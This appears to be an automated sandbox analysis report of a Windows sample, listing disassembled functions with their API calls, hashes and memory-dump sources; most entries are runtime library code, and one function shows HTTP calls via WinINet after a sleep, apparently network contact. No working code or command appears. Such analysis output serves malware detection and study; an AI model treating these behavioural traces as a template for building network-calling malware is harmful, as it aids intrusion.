API ID: List$HeadInitialize$Timer$ArrayCreateHashQueueRegister$AsyncConcurrency::details::Concurrency::details::platform::__Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorH_prolog3LastLibraryLoadObjectSingleWaitstd::bad_exception::bad_exception
String ID:
API String ID: 1224710184-0
Opcode ID: cff4f1584c67b4dd39a057eedf59500e630592c2a8e2e850217cf0530dd3835e
Instruction ID: 542e51054789b9c644638cf5fcf49800cabcccb41fcc6123814cdde33dab0e7c
Opcode Fuzzy Hash: cff4f1584c67b4dd39a057eedf59500e630592c2a8e2e850217cf0530dd3835e
Instruction Fuzzy Hash: BA814DB0A11B26ABD718DF74C844BD9FBA8BF08700F10425BE52897280DBB4B264CFD1

Function 004244DE Relevance: 21.2, APIs: 14, Instructions: 189timeregistryCOMMONLIBRARYCODE

Download Yara Rule

APIs

ListArray.LIBCONCRT ref: 00424538

Part of subcall function 00424319: RtlInitializeSListHead.NTDLL(?), ref: 004243E5
Part of subcall function 00424319: RtlInitializeSListHead.NTDLL(?), ref: 004243EF

ListArray.LIBCONCRT ref: 0042456C
Hash.LIBCMT ref: 004245D5
Hash.LIBCMT ref: 004245E5
RtlInitializeSListHead.NTDLL(?), ref: 0042467A
RtlInitializeSListHead.NTDLL(?), ref: 00424687
RtlInitializeSListHead.NTDLL(?), ref: 00424694
RtlInitializeSListHead.NTDLL(?), ref: 004246A1

Part of subcall function 00429C41: std::bad_exception::bad_exception.LIBCMT ref: 00429C63

RegisterWaitForSingleObject.KERNEL32(?,00000000,00427A15,?,000000FF,00000000), ref: 00424729
Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 0042474B
GetLastError.KERNEL32(0042548B,?,?,00000000,?,?), ref: 0042475D
Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 0042477A

Part of subcall function 0041FBAA: CreateTimerQueueTimer.KERNEL32(?,?,00000000,?,?,0042548B,00000008,?,0042477F,?,00000000,00427A06,?,7FFFFFFF,7FFFFFFF,00000000), ref: 0041FBC2

Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004247A4

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: List$HeadInitialize$Timer$ArrayCreateHashQueueRegister$AsyncConcurrency::details::Concurrency::details::platform::__Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorLastLibraryLoadObjectSingleWaitstd::bad_exception::bad_exception
String ID:
API String ID: 2750799244-0
Opcode ID: cff4f1584c67b4dd39a057eedf59500e630592c2a8e2e850217cf0530dd3835e
Instruction ID: 8edcf0d5cb27459604d76cf7b2957bb715be8d06604c13dd231c773c6d0fd610
Opcode Fuzzy Hash: cff4f1584c67b4dd39a057eedf59500e630592c2a8e2e850217cf0530dd3835e
Instruction Fuzzy Hash: 37816EB0B10B22AAD708DF75D845BD9FBA8BF49704F50021FF42897281CBB8A564CBD5

Function 02342A99 Relevance: 19.7, APIs: 13, Instructions: 223COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::ResourceManager::RetrieveSystemVersionInformation.LIBCONCRT ref: 02342AA8

Part of subcall function 02343D93: GetVersionExW.KERNEL32(?), ref: 02343DB7
Part of subcall function 02343D93: Concurrency::details::WinRT::Initialize.LIBCONCRT ref: 02343E56

Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 02342ABC
Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 02342ADD
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 02342B46
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 02342B7A

Part of subcall function 02340A54: Concurrency::details::ResourceManager::AffinityRestriction::ApplyAffinityLimits.LIBCMT ref: 02340A74

Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 02342BFA

Part of subcall function 023425C3: Concurrency::details::platform::__GetLogicalProcessorInformationEx.LIBCONCRT ref: 023425D7

Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 02342C42

Part of subcall function 02340A29: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 02340A45

Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 02342C56
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 02342C67
Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 02342CB4
Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 02342CD9
Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 02342CE5

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Manager::Resource$Affinity$Apply$Restrictions$Information$Topology$CaptureProcessRestriction::Version$CleanupConcurrency::details::platform::__FindGroupInitializeLimitsLogicalProcessorRetrieveSystem
String ID:
API String ID: 4140532746-0
Opcode ID: 9abd196dbe3760ed533f204942a39c663444424dc11bb6fb8cf1de85ffcec6e8
Instruction ID: 9ee6d10b656ae86c9d3f1a3538366f64a9158c981fb87ea74817a914dd728546
Opcode Fuzzy Hash: 9abd196dbe3760ed533f204942a39c663444424dc11bb6fb8cf1de85ffcec6e8
Instruction Fuzzy Hash: 81819271A105169FCB28DFA8D8906BEB7F5BF48704B2440BEE841B7250EF70BA44CB95

Function 00422832 Relevance: 19.7, APIs: 13, Instructions: 223COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::ResourceManager::RetrieveSystemVersionInformation.LIBCONCRT ref: 00422841

Part of subcall function 00423B2C: GetVersionExW.KERNEL32(?), ref: 00423B50
Part of subcall function 00423B2C: Concurrency::details::WinRT::Initialize.LIBCONCRT ref: 00423BEF

Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 00422855
Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00422876
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 004228DF
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 00422913

Part of subcall function 004207ED: Concurrency::details::ResourceManager::AffinityRestriction::ApplyAffinityLimits.LIBCMT ref: 0042080D

Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00422993

Part of subcall function 0042235C: Concurrency::details::platform::__GetLogicalProcessorInformationEx.LIBCONCRT ref: 00422370

Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 004229DB

Part of subcall function 004207C2: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 004207DE

Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 004229EF
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00422A00
Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 00422A4D
Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 00422A72
Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00422A7E

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Manager::Resource$Affinity$Apply$Restrictions$Information$Topology$CaptureProcessRestriction::Version$CleanupConcurrency::details::platform::__FindGroupInitializeLimitsLogicalProcessorRetrieveSystem
String ID:
API String ID: 4140532746-0
Opcode ID: 9abd196dbe3760ed533f204942a39c663444424dc11bb6fb8cf1de85ffcec6e8
Instruction ID: e80cf76bb90d4b83ff5cf9a0939ff877604985d568bc9a9fcea241cccaa3ebda
Opcode Fuzzy Hash: 9abd196dbe3760ed533f204942a39c663444424dc11bb6fb8cf1de85ffcec6e8
Instruction Fuzzy Hash: 0481BF71B00526ABCB18DF69FA9057EB7F1BB48704B94403ED441A3741EBB8A981CB9D

Function 0041FA71 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 60libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,00423BE6), ref: 0041FA7F
GetProcAddress.KERNEL32(00000000,SetThreadGroupAffinity), ref: 0041FA8D
GetProcAddress.KERNEL32(00000000,GetThreadGroupAffinity), ref: 0041FA9B
GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumberEx), ref: 0041FAC9
GetLastError.KERNEL32(?,?,?,00423BE6), ref: 0041FAE4
GetLastError.KERNEL32(?,?,?,00423BE6), ref: 0041FAF0
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041FB06

Strings

GetThreadGroupAffinity, xrefs: 0041FA93
GetCurrentProcessorNumberEx, xrefs: 0041FABE
SetThreadGroupAffinity, xrefs: 0041FA87
kernel32.dll, xrefs: 0041FA7A

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorLast$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorHandleModule
String ID: GetCurrentProcessorNumberEx$GetThreadGroupAffinity$SetThreadGroupAffinity$kernel32.dll
API String ID: 1654681794-465693683
Opcode ID: 7fe6c5ece6de4c50eb3fb3b842b885c674e1d20cdf18a0be90147e923e9c19f3
Instruction ID: d2013d26350a1230dd44c523f95b164804869e8c7fe68790ab887d0678fdf32d
Opcode Fuzzy Hash: 7fe6c5ece6de4c50eb3fb3b842b885c674e1d20cdf18a0be90147e923e9c19f3
Instruction Fuzzy Hash: 800165396003116F97107BB5BC4ABAB7AACAD04756724053BF805D2293EAACD449866D

Function 0235550C Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 308COMMONLIBRARYCODE

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 02355607
type_info::operator==.LIBVCRUNTIME ref: 0235562E
___TypeMatch.LIBVCRUNTIME ref: 0235573A
CatchIt.LIBVCRUNTIME ref: 0235578F
IsInExceptionSpec.LIBVCRUNTIME ref: 02355815
_UnwindNestedFrames.LIBCMT ref: 0235589C
CallUnexpected.LIBVCRUNTIME ref: 023558B7

Strings

csm, xrefs: 02355547
csm, xrefs: 023555B4
csm, xrefs: 02355665

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 4234981820-393685449
Opcode ID: ad1611b132c96cd88c093627677e3344dfa0a654fa7a6ed2c70fbeb10c1165a9
Instruction ID: 2111f3f2d9ad47fce5fb532b60d9d42cc7bd93f8669d213c6f982e40ea83ccff
Opcode Fuzzy Hash: ad1611b132c96cd88c093627677e3344dfa0a654fa7a6ed2c70fbeb10c1165a9
Instruction Fuzzy Hash: 8FC15871900229EFCF25DFA4C880EAEBBBABF04314F94455AEC196B211D735EA51CF91

Function 004352A5 Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 308COMMONLIBRARYCODE

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 004353A0
type_info::operator==.LIBVCRUNTIME ref: 004353C7
___TypeMatch.LIBVCRUNTIME ref: 004354D3
CatchIt.LIBVCRUNTIME ref: 00435528
IsInExceptionSpec.LIBVCRUNTIME ref: 004355AE
_UnwindNestedFrames.LIBCMT ref: 00435635
CallUnexpected.LIBVCRUNTIME ref: 00435650

Strings

csm, xrefs: 004352E0
csm, xrefs: 004353FE
csm, xrefs: 0043534D

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 4234981820-393685449
Opcode ID: ad1611b132c96cd88c093627677e3344dfa0a654fa7a6ed2c70fbeb10c1165a9
Instruction ID: 7946f23dea792be26d4820a62e4550dff79cbb7357508b3bf55c7f92dc133849
Opcode Fuzzy Hash: ad1611b132c96cd88c093627677e3344dfa0a654fa7a6ed2c70fbeb10c1165a9
Instruction Fuzzy Hash: C3C1AA71800609EFCF19DF95C881AAEBBB5BF1C315F04615BE8156B206C338EA51CF99

Function 02352BD7 Relevance: 16.7, APIs: 11, Instructions: 222COMMON

Download Yara Rule

APIs

Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 02352BE9

Part of subcall function 02352748: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0235276B

Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 02352C0A
Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 02352C17
Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 02352C65
Concurrency::details::WorkSearchContext::SearchCacheLocal_Unrealized.LIBCONCRT ref: 02352D0D
Concurrency::details::WorkSearchContext::SearchCacheLocal_Realized.LIBCONCRT ref: 02352D3F

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Search$Work$Context::$Base::CacheLocal_PriorityScheduler$CheckItemItem::ListNextObjectPeriodicRealizedScanUnrealized
String ID:
API String ID: 1256429809-0
Opcode ID: df65faca3598a56f4a1189fa951469fdc42dcddc43790275eedfd99cb695ca9a
Instruction ID: b39d3b250ed3301f5ba2a8ab062afefc8d672a0206dcf2c2020b67dbff2410a5
Opcode Fuzzy Hash: df65faca3598a56f4a1189fa951469fdc42dcddc43790275eedfd99cb695ca9a
Instruction Fuzzy Hash: 2071AE70900229AFDF16DF58C990FBFBBB6AF45304F04409AEC596B252C732D916DB61

Function 00432970 Relevance: 16.7, APIs: 11, Instructions: 222COMMON

Download Yara Rule

APIs

Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 00432982

Part of subcall function 004324E1: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00432504

Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 004329A3
Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 004329B0
Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 004329FE
Concurrency::details::WorkSearchContext::SearchCacheLocal_Unrealized.LIBCONCRT ref: 00432AA6
Concurrency::details::WorkSearchContext::SearchCacheLocal_Realized.LIBCONCRT ref: 00432AD8

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Search$Work$Context::$Base::CacheLocal_PriorityScheduler$CheckItemItem::ListNextObjectPeriodicRealizedScanUnrealized
String ID:
API String ID: 1256429809-0
Opcode ID: df65faca3598a56f4a1189fa951469fdc42dcddc43790275eedfd99cb695ca9a
Instruction ID: 2c3f4ac1ddb9b2e884700b4006eb7aadb935b7841f65a9e333380771e6a1d96e
Opcode Fuzzy Hash: df65faca3598a56f4a1189fa951469fdc42dcddc43790275eedfd99cb695ca9a
Instruction Fuzzy Hash: 8271BC70A00249AFDF15DF54CA80BBFBBB1AF49308F04509AEC416B352C7B9AD16DB65

Function 0234EC90 Relevance: 16.6, APIs: 11, Instructions: 148windowCOMMON

Download Yara Rule

APIs

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0234ECE0

Part of subcall function 02349196: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 023491B7

Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 0234ECF9
Concurrency::location::_Assign.LIBCMT ref: 0234ED0F
Concurrency::details::ReferenceCountedQuickBitSet::InterlockedSet.LIBCONCRT ref: 0234ED7C
Concurrency::details::SchedulerBase::ClearQuickCacheSlot.LIBCMT ref: 0234ED84
Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 0234EDAB
Concurrency::details::VirtualProcessor::EnsureAllTasksVisible.LIBCONCRT ref: 0234EDB7
Concurrency::details::SchedulerBase::VirtualProcessorIdle.LIBCONCRT ref: 0234EDEF
Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 0234EE0E
Concurrency::details::SchedulerBase::VirtualProcessorIdle.LIBCONCRT ref: 0234EE1C
Concurrency::details::ReferenceCountedQuickBitSet::InterlockedClear.LIBCONCRT ref: 0234EE43

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::$ContextVirtual$Processor::QuickScheduler$ClearCountedEventIdleInterlockedProcessorReferenceSet::$AssignAvailableBlockedCacheConcurrency::location::_DeactivateEnsureInternalMakeSlotSpinTasksThrowTraceUntilVisible
String ID:
API String ID: 3608406545-0
Opcode ID: a39cb41113445c8b37c8e93bd00c54bcce78915a73e61bcd78f9524f0075e564
Instruction ID: 3c64188a5ce00621c529902733c916b499b3829fabfced5dfb5767cafcbd6aa1
Opcode Fuzzy Hash: a39cb41113445c8b37c8e93bd00c54bcce78915a73e61bcd78f9524f0075e564
Instruction Fuzzy Hash: 8F518C757002149FDB14EF24C894BAD77E6BF49310F1845EAED0A9B286CF70B801CBA2

Function 0235ECF5 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 203COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 0235ED1F
_free.LIBCMT ref: 0235EDF8
_free.LIBCMT ref: 0235EE25

Strings

2y, xrefs: 0235ED46, 0235ED85, 0235ED92, 0235EDC9, 0235EE91

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: _free$___from_strstr_to_strchr
String ID: 2y
API String ID: 3409252457-546834805
Opcode ID: b36ae6f94d372ff64b4da89c0af13a455d4f54d85b457d19ac11513aadbc6f32
Instruction ID: b1b212e561ed96d3fd42f86e324e5143c906f5a9816514f792b3b0158049d621
Opcode Fuzzy Hash: b36ae6f94d372ff64b4da89c0af13a455d4f54d85b457d19ac11513aadbc6f32
Instruction Fuzzy Hash: F151D1B1904375AEDB34AFB4D880E6DBBEAAF05324F05416AED1C972C1EB718640CF55

Function 0043EA8E Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 203COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 0043EAB8
_free.LIBCMT ref: 0043EB91
_free.LIBCMT ref: 0043EBBE

Strings

2y, xrefs: 0043EADF, 0043EB1E, 0043EB2B, 0043EB62, 0043EC2A

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: _free$___from_strstr_to_strchr
String ID: 2y
API String ID: 3409252457-546834805
Opcode ID: 7e13cb0b5705e9cade751d436b5392716494f0a3c8e39469c6473571ee0f5945
Instruction ID: f99befb810c5c4866eaf564f7dd7d7d58b29b2c8e151ae40169767ee9d3e76c4
Opcode Fuzzy Hash: 7e13cb0b5705e9cade751d436b5392716494f0a3c8e39469c6473571ee0f5945
Instruction Fuzzy Hash: CC513670D05306AFDB24AFBB9841A6E7BA4DF0D314F00616FE510972C1EA7D9940CB4D

Function 0040BE82 Relevance: 15.3, APIs: 10, Instructions: 343networkfilesleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000005DC), ref: 0040BEB8
InternetOpenW.WININET(00458DC8,00000000,00000000,00000000,00000000), ref: 0040BEC7
InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0040BEEB
HttpOpenRequestA.WININET(?,00000000), ref: 0040BF35
HttpSendRequestA.WININET(?,00000000), ref: 0040BFF5
InternetReadFile.WININET(?,?,000003FF,?), ref: 0040C0A7
InternetReadFile.WININET(?,00000000,000003FF,?), ref: 0040C160
InternetCloseHandle.WININET(?), ref: 0040C187
InternetCloseHandle.WININET(?), ref: 0040C18F
InternetCloseHandle.WININET(?), ref: 0040C197

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSendSleep
String ID:
API String ID: 1439999335-0
Opcode ID: f215b8e2ea09d3ecaada130b4dc6c3e3702a4eea93e94d9dbc2753dde293878e
Instruction ID: 71497d68164bda9dcaa66ce95f0c59154e79fc335b3d255b1b18961781db6419
Opcode Fuzzy Hash: f215b8e2ea09d3ecaada130b4dc6c3e3702a4eea93e94d9dbc2753dde293878e
Instruction Fuzzy Hash: 50D1D5B0A10118DBDB24DF28CD88B9D7B75EF45304F5082AAF909A72D2D7399AC4CF59

Function 02346C41 Relevance: 15.1, APIs: 10, Instructions: 144COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 02346C86
Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 02346CB8
List.LIBCONCRT ref: 02346CF3
Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 02346D04
Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 02346D20
List.LIBCONCRT ref: 02346D5B
Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 02346D6C
Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 02346D87
List.LIBCONCRT ref: 02346DC2
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 02346DCF

Part of subcall function 02346146: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 0234615E
Part of subcall function 02346146: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 02346170

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Scheduling$Find$GroupNode::ProcessorRing::ScheduleSegmentVirtual$ListNext$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
String ID:
API String ID: 3403738998-0
Opcode ID: 2f7af67c50368df58dbc42c7a39e667be4f9f9c44dd16b3d404a49fb0bf2eeba
Instruction ID: cdc260a85507b7a1cafc5f974d416c615c25083b1cd77662c4d82f91b7f854a8
Opcode Fuzzy Hash: 2f7af67c50368df58dbc42c7a39e667be4f9f9c44dd16b3d404a49fb0bf2eeba
Instruction Fuzzy Hash: E0513AB1A00219ABDB18DF65C595BEDB3F9FF0A344F4540AAD915AB281DB30BE44CF90

Function 004269DA Relevance: 15.1, APIs: 10, Instructions: 144COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00426A1F
Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00426A51
List.LIBCONCRT ref: 00426A8C
Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00426A9D
Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00426AB9
List.LIBCONCRT ref: 00426AF4
Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00426B05
Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426B20
List.LIBCONCRT ref: 00426B5B
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00426B68

Part of subcall function 00425EDF: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00425EF7
Part of subcall function 00425EDF: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00425F09

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Scheduling$Find$GroupNode::ProcessorRing::ScheduleSegmentVirtual$ListNext$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
String ID:
API String ID: 3403738998-0
Opcode ID: 2f7af67c50368df58dbc42c7a39e667be4f9f9c44dd16b3d404a49fb0bf2eeba
Instruction ID: 579499c82c18d5a5ade90e723c63f8c40f3c28f02b2f1580fedc01109288aa91
Opcode Fuzzy Hash: 2f7af67c50368df58dbc42c7a39e667be4f9f9c44dd16b3d404a49fb0bf2eeba
Instruction Fuzzy Hash: 9C516170B00229ABDB04DF65D495BEEB7A8FF08304F45406EE915EB381DB78AE45CB94

Function 0235A7C0 Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0235A7D6

Part of subcall function 0235B05C: HeapFree.KERNEL32(00000000,00000000,?,0235F334,?,00000000,?,?,?,0235F35B,?,00000007,?,?,0235F75D,?), ref: 0235B072
Part of subcall function 0235B05C: GetLastError.KERNEL32(?,?,0235F334,?,00000000,?,?,?,0235F35B,?,00000007,?,?,0235F75D,?,?), ref: 0235B084

_free.LIBCMT ref: 0235A7E2
_free.LIBCMT ref: 0235A7ED
_free.LIBCMT ref: 0235A7F8
_free.LIBCMT ref: 0235A803
_free.LIBCMT ref: 0235A80E
_free.LIBCMT ref: 0235A819
_free.LIBCMT ref: 0235A824
_free.LIBCMT ref: 0235A82F
_free.LIBCMT ref: 0235A83D

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 1702a0a1dc840abddd1c64ba95121113f610cdca08529299edb68c6a0e13c010
Instruction ID: cd3fea2af597bcb4f306dd8fa191985cba9ce4ebd7e781e694fb48d394862916
Opcode Fuzzy Hash: 1702a0a1dc840abddd1c64ba95121113f610cdca08529299edb68c6a0e13c010
